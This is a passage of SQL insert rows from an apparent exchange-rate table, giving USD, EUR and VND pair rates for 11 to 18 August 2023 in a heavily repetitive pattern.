(7688, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-08-11'),
(7689, 2, 'EUR', 1.000000, 1, 'USD', 1.096800, '2023-08-11'),
(7690, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-08-11'),
(7691, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-08-11'),
(7692, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-08-11'),
(7693, 1, 'USD', 0.000000, 2, 'EUR', 0.907520, '2023-08-11'),
(7694, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-08-11'),
(7695, 2, 'EUR', 0.000000, 1, 'USD', 1.101900, '2023-08-11'),
(7696, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-08-11'),
(7697, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-08-11'),
(7698, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-08-11'),
(7699, 1, 'USD', 1.000000, 2, 'EUR', 0.907520, '2023-08-11'),
(7700, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-08-11'),
(7701, 2, 'EUR', 1.000000, 1, 'USD', 1.101900, '2023-08-11'),
(7702, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-08-11'),
(7703, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-08-11'),
(7704, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-08-11'),
(7705, 1, 'USD', 0.000000, 2, 'EUR', 0.907520, '2023-08-11'),
(7706, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-08-11'),
(7707, 2, 'EUR', 0.000000, 1, 'USD', 1.101900, '2023-08-11'),
(7708, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-08-11'),
(7709, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-08-11'),
(7710, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-08-11'),
(7711, 1, 'USD', 1.000000, 2, 'EUR', 0.907520, '2023-08-11'),
(7712, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-08-11'),
(7713, 2, 'EUR', 1.000000, 1, 'USD', 1.101900, '2023-08-11'),
(7714, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-08-11'),
(7715, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-08-11'),
(7716, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-08-11'),
(7717, 1, 'USD', 0.000000, 2, 'EUR', 0.907520, '2023-08-11'),
(7718, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-08-11'),
(7719, 2, 'EUR', 0.000000, 1, 'USD', 1.101900, '2023-08-11'),
(7720, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-08-11'),
(7721, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-08-11'),
(7722, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-08-11'),
(7723, 1, 'USD', 1.000000, 2, 'EUR', 0.907520, '2023-08-11'),
(7724, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-08-11'),
(7725, 2, 'EUR', 1.000000, 1, 'USD', 1.101900, '2023-08-11'),
(7726, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-08-11'),
(7727, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-08-11'),
(7728, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-08-11'),
(7729, 1, 'USD', 0.000000, 2, 'EUR', 0.907520, '2023-08-11'),
(7730, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-08-11'),
(7731, 2, 'EUR', 0.000000, 1, 'USD', 1.101900, '2023-08-11'),
(7732, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-08-11'),
(7733, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-08-11'),
(7734, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-08-11'),
(7735, 1, 'USD', 1.000000, 2, 'EUR', 0.907520, '2023-08-12'),
(7736, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-08-12'),
(7737, 2, 'EUR', 1.000000, 1, 'USD', 1.101900, '2023-08-12'),
(7738, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-08-12'),
(7739, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-08-12'),
(7740, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-08-12'),
(7741, 1, 'USD', 0.000000, 2, 'EUR', 0.908760, '2023-08-12'),
(7742, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-08-12'),
(7743, 2, 'EUR', 0.000000, 1, 'USD', 1.100400, '2023-08-12'),
(7744, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-08-12'),
(7745, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-08-12'),
(7746, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-08-12'),
(7747, 1, 'USD', 1.000000, 2, 'EUR', 0.908760, '2023-08-12'),
(7748, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-08-12'),
(7749, 2, 'EUR', 1.000000, 1, 'USD', 1.100400, '2023-08-12'),
(7750, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-08-12'),
(7751, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-08-12'),
(7752, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-08-12'),
(7753, 1, 'USD', 0.000000, 2, 'EUR', 0.908760, '2023-08-12'),
(7754, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-08-12'),
(7755, 2, 'EUR', 0.000000, 1, 'USD', 1.100400, '2023-08-12'),
(7756, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-08-12'),
(7757, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-08-12'),
(7758, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-08-12'),
(7759, 1, 'USD', 1.000000, 2, 'EUR', 0.908760, '2023-08-12'),
(7760, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-08-12'),
(7761, 2, 'EUR', 1.000000, 1, 'USD', 1.100400, '2023-08-12'),
(7762, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-08-12'),
(7763, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-08-12'),
(7764, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-08-12'),
(7765, 1, 'USD', 0.000000, 2, 'EUR', 0.908760, '2023-08-12'),
(7766, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-08-12'),
(7767, 2, 'EUR', 0.000000, 1, 'USD', 1.100400, '2023-08-12'),
(7768, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-08-12'),
(7769, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-08-12'),
(7770, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-08-12'),
(7771, 1, 'USD', 1.000000, 2, 'EUR', 0.908760, '2023-08-12'),
(7772, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-08-12'),
(7773, 2, 'EUR', 1.000000, 1, 'USD', 1.100400, '2023-08-12'),
(7774, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-08-12'),
(7775, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-08-12'),
(7776, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-08-12'),
(7777, 1, 'USD', 0.000000, 2, 'EUR', 0.908760, '2023-08-12'),
(7778, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-08-12'),
(7779, 2, 'EUR', 0.000000, 1, 'USD', 1.100400, '2023-08-12'),
(7780, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-08-12'),
(7781, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-08-12'),
(7782, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-08-12'),
(7783, 1, 'USD', 1.000000, 2, 'EUR', 0.908760, '2023-08-13'),
(7784, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-08-13'),
(7785, 2, 'EUR', 1.000000, 1, 'USD', 1.100400, '2023-08-13'),
(7786, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-08-13'),
(7787, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-08-13'),
(7788, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-08-13'),
(7789, 1, 'USD', 0.000000, 2, 'EUR', 0.908760, '2023-08-13'),
(7790, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-08-13'),
(7791, 2, 'EUR', 0.000000, 1, 'USD', 1.100400, '2023-08-13'),
(7792, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-08-13'),
(7793, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-08-13'),
(7794, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-08-13'),
(7795, 1, 'USD', 1.000000, 2, 'EUR', 0.908760, '2023-08-13'),
(7796, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-08-13'),
(7797, 2, 'EUR', 1.000000, 1, 'USD', 1.100400, '2023-08-13'),
(7798, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-08-13'),
(7799, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-08-13'),
(7800, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-08-13'),
(7801, 1, 'USD', 0.000000, 2, 'EUR', 0.908760, '2023-08-13'),
(7802, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-08-13'),
(7803, 2, 'EUR', 0.000000, 1, 'USD', 1.100400, '2023-08-13'),
(7804, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-08-13'),
(7805, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-08-13'),
(7806, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-08-13'),
(7807, 1, 'USD', 1.000000, 2, 'EUR', 0.908760, '2023-08-13'),
(7808, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-08-13'),
(7809, 2, 'EUR', 1.000000, 1, 'USD', 1.100400, '2023-08-13'),
(7810, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-08-13'),
(7811, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-08-13'),
(7812, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-08-13'),
(7813, 1, 'USD', 0.000000, 2, 'EUR', 0.908760, '2023-08-13'),
(7814, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-08-13'),
(7815, 2, 'EUR', 0.000000, 1, 'USD', 1.100400, '2023-08-13'),
(7816, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-08-13'),
(7817, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-08-13'),
(7818, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-08-13'),
(7819, 1, 'USD', 1.000000, 2, 'EUR', 0.908760, '2023-08-13'),
(7820, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-08-13'),
(7821, 2, 'EUR', 1.000000, 1, 'USD', 1.100400, '2023-08-13'),
(7822, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-08-13'),
(7823, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-08-13'),
(7824, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-08-13'),
(7825, 1, 'USD', 0.000000, 2, 'EUR', 0.908760, '2023-08-13'),
(7826, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-08-13'),
(7827, 2, 'EUR', 0.000000, 1, 'USD', 1.100400, '2023-08-13'),
(7828, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-08-13'),
(7829, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-08-13'),
(7830, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-08-13'),
(7831, 1, 'USD', 1.000000, 2, 'EUR', 0.908760, '2023-08-14'),
(7832, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-08-14'),
(7833, 2, 'EUR', 1.000000, 1, 'USD', 1.100400, '2023-08-14'),
(7834, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-08-14'),
(7835, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-08-14'),
(7836, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-08-14'),
(7837, 1, 'USD', 0.000000, 2, 'EUR', 0.908760, '2023-08-14'),
(7838, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-08-14'),
(7839, 2, 'EUR', 0.000000, 1, 'USD', 1.100400, '2023-08-14'),
(7840, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-08-14'),
(7841, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-08-14'),
(7842, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-08-14'),
(7843, 1, 'USD', 1.000000, 2, 'EUR', 0.908760, '2023-08-14'),
(7844, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-08-14'),
(7845, 2, 'EUR', 1.000000, 1, 'USD', 1.100400, '2023-08-14'),
(7846, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-08-14'),
(7847, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-08-14'),
(7848, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-08-14'),
(7849, 1, 'USD', 0.000000, 2, 'EUR', 0.908760, '2023-08-14'),
(7850, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-08-14'),
(7851, 2, 'EUR', 0.000000, 1, 'USD', 1.100400, '2023-08-14'),
(7852, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-08-14'),
(7853, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-08-14'),
(7854, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-08-14'),
(7855, 1, 'USD', 1.000000, 2, 'EUR', 0.908760, '2023-08-14'),
(7856, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-08-14'),
(7857, 2, 'EUR', 1.000000, 1, 'USD', 1.100400, '2023-08-14'),
(7858, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-08-14'),
(7859, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-08-14'),
(7860, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-08-14'),
(7861, 1, 'USD', 0.000000, 2, 'EUR', 0.908760, '2023-08-14'),
(7862, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-08-14'),
(7863, 2, 'EUR', 0.000000, 1, 'USD', 1.100400, '2023-08-14'),
(7864, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-08-14'),
(7865, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-08-14'),
(7866, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-08-14'),
(7867, 1, 'USD', 1.000000, 2, 'EUR', 0.908760, '2023-08-14'),
(7868, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-08-14'),
(7869, 2, 'EUR', 1.000000, 1, 'USD', 1.100400, '2023-08-14'),
(7870, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-08-14'),
(7871, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-08-14'),
(7872, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-08-14'),
(7873, 1, 'USD', 0.000000, 2, 'EUR', 0.908760, '2023-08-14'),
(7874, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-08-14'),
(7875, 2, 'EUR', 0.000000, 1, 'USD', 1.100400, '2023-08-14'),
(7876, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-08-14'),
(7877, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-08-14'),
(7878, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-08-14'),
(7879, 1, 'USD', 1.000000, 2, 'EUR', 0.908760, '2023-08-15'),
(7880, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-08-15'),
(7881, 2, 'EUR', 1.000000, 1, 'USD', 1.100400, '2023-08-15'),
(7882, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-08-15'),
(7883, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-08-15'),
(7884, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-08-15'),
(7885, 1, 'USD', 0.000000, 2, 'EUR', 0.914910, '2023-08-15'),
(7886, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-08-15'),
(7887, 2, 'EUR', 0.000000, 1, 'USD', 1.093000, '2023-08-15'),
(7888, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-08-15'),
(7889, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-08-15'),
(7890, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-08-15'),
(7891, 1, 'USD', 1.000000, 2, 'EUR', 0.914910, '2023-08-15'),
(7892, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-08-15'),
(7893, 2, 'EUR', 1.000000, 1, 'USD', 1.093000, '2023-08-15'),
(7894, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-08-15'),
(7895, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-08-15'),
(7896, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-08-15'),
(7897, 1, 'USD', 0.000000, 2, 'EUR', 0.914910, '2023-08-15'),
(7898, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-08-15'),
(7899, 2, 'EUR', 0.000000, 1, 'USD', 1.093000, '2023-08-15'),
(7900, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-08-15'),
(7901, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-08-15'),
(7902, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-08-15'),
(7903, 1, 'USD', 1.000000, 2, 'EUR', 0.914910, '2023-08-15'),
(7904, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-08-15'),
(7905, 2, 'EUR', 1.000000, 1, 'USD', 1.093000, '2023-08-15'),
(7906, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-08-15'),
(7907, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-08-15'),
(7908, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-08-15'),
(7909, 1, 'USD', 0.000000, 2, 'EUR', 0.914910, '2023-08-15'),
(7910, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-08-15'),
(7911, 2, 'EUR', 0.000000, 1, 'USD', 1.093000, '2023-08-15'),
(7912, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-08-15'),
(7913, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-08-15'),
(7914, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-08-15'),
(7915, 1, 'USD', 1.000000, 2, 'EUR', 0.914910, '2023-08-15'),
(7916, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-08-15'),
(7917, 2, 'EUR', 1.000000, 1, 'USD', 1.093000, '2023-08-15'),
(7918, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-08-15'),
(7919, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-08-15'),
(7920, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-08-15'),
(7921, 1, 'USD', 0.000000, 2, 'EUR', 0.914910, '2023-08-15'),
(7922, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-08-15'),
(7923, 2, 'EUR', 0.000000, 1, 'USD', 1.093000, '2023-08-15'),
(7924, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-08-15'),
(7925, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-08-15'),
(7926, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-08-15'),
(7927, 1, 'USD', 1.000000, 2, 'EUR', 0.914910, '2023-08-16'),
(7928, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-08-16'),
(7929, 2, 'EUR', 1.000000, 1, 'USD', 1.093000, '2023-08-16'),
(7930, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-08-16'),
(7931, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-08-16'),
(7932, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-08-16'),
(7933, 1, 'USD', 0.000000, 2, 'EUR', 0.915250, '2023-08-16'),
(7934, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-08-16'),
(7935, 2, 'EUR', 0.000000, 1, 'USD', 1.092600, '2023-08-16'),
(7936, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-08-16'),
(7937, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-08-16'),
(7938, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-08-16'),
(7939, 1, 'USD', 1.000000, 2, 'EUR', 0.915250, '2023-08-16'),
(7940, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-08-16'),
(7941, 2, 'EUR', 1.000000, 1, 'USD', 1.092600, '2023-08-16'),
(7942, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-08-16'),
(7943, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-08-16'),
(7944, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-08-16'),
(7945, 1, 'USD', 0.000000, 2, 'EUR', 0.915250, '2023-08-16'),
(7946, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-08-16'),
(7947, 2, 'EUR', 0.000000, 1, 'USD', 1.092600, '2023-08-16'),
(7948, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-08-16'),
(7949, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-08-16'),
(7950, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-08-16'),
(7951, 1, 'USD', 1.000000, 2, 'EUR', 0.915250, '2023-08-16'),
(7952, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-08-16'),
(7953, 2, 'EUR', 1.000000, 1, 'USD', 1.092600, '2023-08-16'),
(7954, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-08-16'),
(7955, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-08-16'),
(7956, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-08-16'),
(7957, 1, 'USD', 0.000000, 2, 'EUR', 0.915250, '2023-08-16'),
(7958, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-08-16'),
(7959, 2, 'EUR', 0.000000, 1, 'USD', 1.092600, '2023-08-16'),
(7960, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-08-16'),
(7961, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-08-16'),
(7962, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-08-16'),
(7963, 1, 'USD', 1.000000, 2, 'EUR', 0.915250, '2023-08-16'),
(7964, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-08-16'),
(7965, 2, 'EUR', 1.000000, 1, 'USD', 1.092600, '2023-08-16'),
(7966, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-08-16'),
(7967, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-08-16'),
(7968, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-08-16'),
(7969, 1, 'USD', 0.000000, 2, 'EUR', 0.915250, '2023-08-16'),
(7970, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-08-16'),
(7971, 2, 'EUR', 0.000000, 1, 'USD', 1.092600, '2023-08-16'),
(7972, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-08-16'),
(7973, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-08-16'),
(7974, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-08-16'),
(7975, 1, 'USD', 1.000000, 2, 'EUR', 0.915250, '2023-08-17'),
(7976, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-08-17'),
(7977, 2, 'EUR', 1.000000, 1, 'USD', 1.092600, '2023-08-17'),
(7978, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-08-17'),
(7979, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-08-17'),
(7980, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-08-17'),
(7981, 1, 'USD', 0.000000, 2, 'EUR', 0.916090, '2023-08-17'),
(7982, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-08-17'),
(7983, 2, 'EUR', 0.000000, 1, 'USD', 1.091600, '2023-08-17'),
(7984, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-08-17'),
(7985, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-08-17'),
(7986, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-08-17'),
(7987, 1, 'USD', 1.000000, 2, 'EUR', 0.916090, '2023-08-17'),
(7988, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-08-17'),
(7989, 2, 'EUR', 1.000000, 1, 'USD', 1.091600, '2023-08-17'),
(7990, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-08-17'),
(7991, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-08-17'),
(7992, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-08-17'),
(7993, 1, 'USD', 0.000000, 2, 'EUR', 0.916090, '2023-08-17'),
(7994, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-08-17'),
(7995, 2, 'EUR', 0.000000, 1, 'USD', 1.091600, '2023-08-17'),
(7996, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-08-17'),
(7997, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-08-17'),
(7998, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-08-17'),
(7999, 1, 'USD', 1.000000, 2, 'EUR', 0.916090, '2023-08-17'),
(8000, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-08-17'),
(8001, 2, 'EUR', 1.000000, 1, 'USD', 1.091600, '2023-08-17'),
(8002, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-08-17'),
(8003, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-08-17'),
(8004, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-08-17'),
(8005, 1, 'USD', 0.000000, 2, 'EUR', 0.916090, '2023-08-17'),
(8006, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-08-17'),
(8007, 2, 'EUR', 0.000000, 1, 'USD', 1.091600, '2023-08-17'),
(8008, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-08-17'),
(8009, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-08-17'),
(8010, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-08-17'),
(8011, 1, 'USD', 1.000000, 2, 'EUR', 0.916090, '2023-08-17'),
(8012, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-08-17'),
(8013, 2, 'EUR', 1.000000, 1, 'USD', 1.091600, '2023-08-17'),
(8014, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-08-17'),
(8015, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-08-17'),
(8016, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-08-17'),
(8017, 1, 'USD', 0.000000, 2, 'EUR', 0.916090, '2023-08-17'),
(8018, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-08-17'),
(8019, 2, 'EUR', 0.000000, 1, 'USD', 1.091600, '2023-08-17'),
(8020, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-08-17'),
(8021, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-08-17'),
(8022, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-08-17'),
(8023, 1, 'USD', 1.000000, 2, 'EUR', 0.916090, '2023-08-18'),
(8024, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-08-18'),
(8025, 2, 'EUR', 1.000000, 1, 'USD', 1.091600, '2023-08-18'),
(8026, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-08-18'),
(8027, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-08-18'),
(8028, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-08-18'),
(8029, 1, 'USD', 0.000000, 2, 'EUR', 0.917430, '2023-08-18'),
(8030, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-08-18'),
(8031, 2, 'EUR', 0.000000, 1, 'USD', 1.090000, '2023-08-18'),
(8032, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-08-18'),
(8033, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-08-18'),
(8034, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-08-18'),
(8035, 1, 'USD', 1.000000, 2, 'EUR', 0.917430, '2023-08-18'),
(8036, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-08-18'),
(8037, 2, 'EUR', 1.000000, 1, 'USD', 1.090000, '2023-08-18'),
(8038, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-08-18'),
